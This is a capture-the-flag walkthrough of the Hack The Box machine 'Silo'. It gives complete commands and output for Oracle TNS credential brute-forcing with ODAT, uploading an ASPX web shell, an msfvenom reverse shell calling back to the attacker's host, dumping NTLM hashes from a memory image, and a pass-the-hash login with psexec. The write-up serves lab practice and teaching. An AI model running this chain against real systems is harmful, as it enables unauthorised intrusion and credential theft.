The first step was to run Nmap against the machine to identify hidden services:
# Nmap 7.91 scan initiated Tue Dec 29 08:06:50 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.82 Nmap scan report for 10.10.10.82 Host is up (0.021s latency). Not shown: 65520 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC 49162/tcp open msrpc Microsoft Windows RPC Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-29T13:09:29 |_ start_date: 2020-12-29T11:37:20 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Dec 29 08:09:33 2020 -- 1 IP address (1 host up) scanned in 163.06 seconds
You can see from the output that there are a number of open ports. I started with port 80 as this is the most familiar with me, but it only navigated to the default IIS page. Dirbuster identified no other hidden directories.
I next moved onto the Oracle TNS listener on port 1521. There is a tool called ODAT which can be used to enumerate and exploit this machine. I downloaded and installed the tool, then ran in specifying in the arguments to run every option.
┌──(root💀kali)-[/home/kali/Documents/silo/odat] └─# python3 ./odat.py all -s 10.10.10.82 2 ⨯ [1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)? [+] The target is vulnerable to a remote TNS poisoning [2] (10.10.10.82:1521): Searching valid SIDs [2.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... ######################################### | ETA: 00:00:00 [+] 'XEXDB' is a valid SID. Continue... 100% |############################################################################################| Time: 00:00:52 [2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |############################################################################################| Time: 00:00:01 [2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... ############################### | ETA: 00:00:04 100% |############################################################################################| Time: 00:00:42 [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB [3] (10.10.10.82:1521): Searching valid accounts on the XE SID The login cis has already been tested at least once. What do you want to do: | ETA: 00:02:28 - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) A The login #internal has already been tested at least once. What do you want to do: | ETA: 00:02:29 - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) C [+] Valid credentials found: scott/tiger. Continue... ####################### | ETA: 00:00:49 100% |############################################################################################| Time: 00:03:53 [+] Accounts found on 10.10.10.82:1521/XE: scott/tiger [4] (10.10.10.82:1521): Searching valid accounts on the XEXDB SID The login abm has already been tested at least once. What do you want to do: | ETA: --:--:-- - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) c [+] Valid credentials found: scott/tiger. Continue... ####################### | ETA: 00:00:34 100% |############################################################################################| Time: 00:02:54 [+] Accounts found on 10.10.10.82:1521/XEXDB: scott/tiger [5] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account |############################################################################################| Time: 00:00:49
You can see from the output that there was 2 SID’s that were discovered. XE and XEXDB. The credentials scott/tiger were also found. Using the same ODAT tool I then uploaded a reverse shell to the machine. Based on experience I know that by default the web content in IIS is stored in c:\\inetpub\wwwroot. Because of this I uploaded an ASPX shell to that directory so it can be interacted with through the web browser. The aspx file was the daulty kali one found in /usr/share/webshells/aspx/cmdasp.aspx.
┌──(root💀kali)-[/home/kali/Documents/silo/odat] └─# python3 odat.py utlfile --putFile "c:\\inetpub\wwwroot" "cmdasp.aspx" "cmdasp.aspx" -s 10.10.10.82 -d XE -U scott -P tiger --sysdba 3 ⚙ [1] (10.10.10.82:1521): Put the cmdasp.aspx local file in the c:\inetpub\wwwroot folder like cmdasp.aspx on the 10.10.10.82 server [+] The cmdasp.aspx file was created on the c:\inetpub\wwwroot directory on the 10.10.10.82 server like the cmdasp.aspx file
Once this has run i browsed to http://10.10.10.82/cmdasp.aspx and was greeted with the ASPX shell.
I then created a reverse shell in MSFVENOM to allow me to interact with the machine more easily.
┌──(root💀kali)-[/var/www] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse2600.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes
This was then uploaded to the Silo machine using the ODAT tool and the same method as before.
┌──(root💀kali)-[/home/kali/Documents/silo/odat] └─# python3 odat.py utlfile --putFile "c:\\inetpub\wwwroot" "reverse2600.exe" "reverse2600.exe" -s 10.10.10.82 -d XE -U scott -P tiger --sysdba 3 ⚙ [1] (10.10.10.82:1521): Put the reverse2600.exe local file in the c:\inetpub\wwwroot folder like reverse2600.exe on the 10.10.10.82 server [+] The reverse2600.exe file was created on the c:\inetpub\wwwroot directory on the 10.10.10.82 server like the reverse2600.exe file
I then started a Netcat listener on the Kali machine on port 2600.
┌──(root💀kali)-[/var/www] └─# nc -nvlp 2600 listening on [any] 2600 ...
Then executed the reverse2600.exe shell on the Silo machine using the cmdasp.aspx web interface by entering the command c:\inetpub\wwwroot\reverse2600.exe. The shell was successfully captured with Netcat, and I was able to capture the user flag.
┌──(root💀kali)-[/var/www] └─# nc -nvlp 2600 listening on [any] 2600 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.82] 49163 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>cd /Users cd /Users c:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 78D4-EA4D Directory of c:\Users 01/04/2018 09:40 PM <DIR> . 01/04/2018 09:40 PM <DIR> .. 01/03/2018 01:03 AM <DIR> .NET v2.0 01/03/2018 01:03 AM <DIR> .NET v2.0 Classic 01/03/2018 09:23 PM <DIR> .NET v4.5 01/03/2018 09:23 PM <DIR> .NET v4.5 Classic 01/01/2018 12:49 AM <DIR> Administrator 01/03/2018 01:03 AM <DIR> Classic .NET AppPool 01/07/2018 02:04 PM <DIR> Phineas 08/22/2013 03:39 PM <DIR> Public 0 File(s) 0 bytes 10 Dir(s) 15,030,591,488 bytes free c:\Users>cd Phineas cd Phineas c:\Users\Phineas>cd Desktop cd Desktop c:\Users\Phineas\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 78D4-EA4D Directory of c:\Users\Phineas\Desktop 01/07/2018 02:03 PM <DIR> . 01/07/2018 02:03 PM <DIR> .. 01/05/2018 10:56 PM 300 Oracle issue.txt 01/04/2018 09:41 PM 32 user.txt 2 File(s) 332 bytes 2 Dir(s) 15,035,412,480 bytes free c:\Users\Phineas\Desktop>type user.txt type user.txt [REDACTED]
The next step was to esclate privilages. I opened the “Oracle issue.txt” file which was also located on the desktop.
c:\Users\Phineas\Desktop>more "Oracle issue.txt" more "Oracle issue.txt" Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$ c:\Users\Phineas\Desktop>
So i visited the link and downloaded the dump file. I then opened the file in Volatility.
┌──(root💀kali)-[/home/kali/Documents/silo] └─# python ../Programs/volatility/volatility/vol.py imageinfo -f b.dmp 1 ⨯ 2 ⚙ Volatility Foundation Volatility Framework 2.6.1 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_14393, Win10x64_18362, Win2012R2x64, Win2012R2x64_18340, Win10x64, Win2016x64_14393, Win10x64_16299, Win10x64_10240_17770, Win10x64_19041, Win2012x64, Win10x64_17763, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063) AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS) AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS) AS Layer3 : FileAddressSpace (/home/kali/Documents/silo/b.dmp) PAE type : No PAE DTB : 0x1a7000L KDBG : 0xf80078520a30L Number of Processors : 2 Image Type (Service Pack) : 0 KPCR for CPU 0 : 0xfffff8007857b000L KPCR for CPU 1 : 0xffffd000207e8000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2018-01-05 22:18:07 UTC+0000 Image local date and time : 2018-01-05 22:18:07 +0000
We can see from the output that it was successful in being read. I then dumped the hashes from the file. I had to specify a profile which I determined using the “systeminfo” command on the Silo machine.
┌──(root💀kali)-[/home/kali/Documents/silo] └─# python ../Programs/volatility/volatility/vol.py hashdump --profile=Win2012R2x64 -f b.dmp 1 ⨯ 2 ⚙ Volatility Foundation Volatility Framework 2.6.1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
I tried to then crack the Administrator hash but had no luck. I instead used PSEXEC by Impacket to login to the silo machine passing the captured hash.
┌──(root💀kali)-[/var/www] └─# python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 Administrator@10.10.10.82 1 ⨯ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.82..... [*] Found writable share ADMIN$ [*] Uploading file ChGRCoZk.exe [*] Opening SVCManager on 10.10.10.82..... [*] Creating service mUVA on 10.10.10.82..... [*] Starting service mUVA..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>cd /users C:\Users>cd Administrator C:\Users\Administrator>dir Volume in drive C has no label. Volume Serial Number is 78D4-EA4D Directory of C:\Users\Administrator 01/01/2018 12:49 AM <DIR> . 01/01/2018 12:49 AM <DIR> .. 01/06/2018 09:13 PM <DIR> Contacts 01/07/2018 01:34 PM <DIR> Desktopc 01/06/2018 09:13 PM <DIR> Documents d01/07/2018 09:35 PM <DIR> Downloads 01/06/2018 09:13 PM <DIR> Favorites 01/06/2018 09:13 PM <DIR> Links 01/06/2018 09:13 PM <DIR> Music 01/01/2018 12:11 AM <DIR> Oracle 01/06/2018 09:13 PM <DIR> Pictures 01/06/2018 09:13 PM <DIR> Saved Games 01/06/2018 09:13 PM <DIR> Searches 01/06/2018 09:13 PM <DIR> Videos 0 File(s) 0 bytes 14 Dir(s) 16,938,364,928 bytes free C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 78D4-EA4D Directory of C:\Users\Administrator\Desktop 01/07/2018 01:34 PM <DIR> . 01/07/2018 01:34 PM <DIR> .. 01/03/2018 11:38 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 16,938,364,928 bytes free C:\Users\Administrator\Desktop>type root.txt [REDACTED]
From the output you can see that this was successful. It successfully logged into the Silo machine as Administrator using the hash. I was then able to capture the root flag.